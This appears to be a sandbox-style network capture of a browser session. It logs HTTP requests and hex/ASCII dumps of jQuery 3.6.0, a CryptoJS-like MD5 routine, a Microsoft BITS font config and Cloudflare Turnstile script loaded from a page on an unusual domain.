2024-07-03 07:40:34 UTC	1369	IN	Data Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 Data Ascii: a.sin(t+1))\|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8\|n>>>24)\|4278255360&(n<<24\|n>>>8)}var o=thi
2024-07-03 07:40:34 UTC	1369	IN	Data Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:34 UTC	623	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://vkwek.ckyucle.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:34 UTC	567	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 1397005 Date: Wed, 03 Jul 2024 07:40:34 GMT X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890097-NYC X-Cache: HIT, HIT X-Cache-Hits: 52, 0 X-Timer: S1719992434.193637,VS0,VE1 Vary: Accept-Encoding
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66 Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f Data Ascii: on(e){var t,n;return!(!e\|\|"[object Object]"!==o.call(e))&&(!(t=r(e))\|\|"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74 Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked\|selected\|async\|autofocus\|autoplay\|controls\|defer\|disabled\|hidden\|ismap\|loop\|multiple\|open\|readonly\|required\|scoped",M="[\\x20\\t
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?\|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t\|\|(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10\|55296,1023&n\|56320))},re=/([\0-\x1f\x7f]\|^-?\d)\|^-$\|[^\0-\x1f\
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28 Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)\|\|e)===e&&d.scope\|\|((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument\|
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28 Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27 Data Ascii: ["+M+"name"+M+"="+M+"(?:''\|\"\")"),e.querySelectorAll(":checked").length\|\|v.push(":checked"),e.querySelectorAll("a#"+S+"+").length\|\|v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
2024-07-03 07:40:34 UTC	1378	IN	Data Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n\|\|(1&(n=(e.ownerDocument\|\|e)==(t.ownerDocument\|\|t)?e.compareDocumentPosition(t):1)\|\|!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C\|\|e.ownerDocument==p&&y(p,e)?-1:t==C\|\|t.ownerDocument==p

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:34 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-03 07:40:35 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=116949 Date: Wed, 03 Jul 2024 07:40:34 GMT Content-Length: 55 Connection: close X-CID: 2
2024-07-03 07:40:35 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:34 UTC	648	OUT	GET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://vkwek.ckyucle.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:35 UTC	408	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:35 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 42691 Connection: close accept-ranges: bytes last-modified: Thu, 27 Jun 2024 13:08:16 GMT cache-control: max-age=31536000 access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 89d53a6ecce841f2-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:35 UTC	961	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 2c 61 2c 72 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 75 5d 28 67 29 2c 5f 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 6c 29 7b 72 28 6c 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 61 28 5f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 5f 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 61 2c 72 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);funct
2024-07-03 07:40:35 UTC	1369	IN	Data Raw: 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 61 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 3d 61 21 3d 6e 75 6c 6c 3f 61 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 Data Ascii: tySymbols){var o=Object.getOwnPropertySymbols(e);a&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),r.push.apply(r,o)}return r}function Tt(e,a){return a=a!=null?a:{},Object.getOwnPropertyDescriptors?Object.definePropertie
2024-07-03 07:40:35 UTC	1369	IN	Data Raw: 28 65 2c 61 29 7c 7c 52 74 28 65 2c 61 29 7c 7c 41 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 2c 61 29 7b 76 61 72 20 72 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 5d 26 31 29 74 68 72 6f 77 20 75 5b 31 5d 3b 72 65 74 75 72 6e 20 75 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 63 2c 75 2c 67 3b 72 65 74 75 72 6e 20 67 3d 7b 6e Data Ascii: (e,a)\|\|Rt(e,a)\|\|At()}function C(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ce(e,a){var r={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={n
2024-07-03 07:40:35 UTC	1369	IN	Data Raw: 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 43 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4e 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 Data Ascii: enges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ct=300020;var Ne=300030;var U;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE
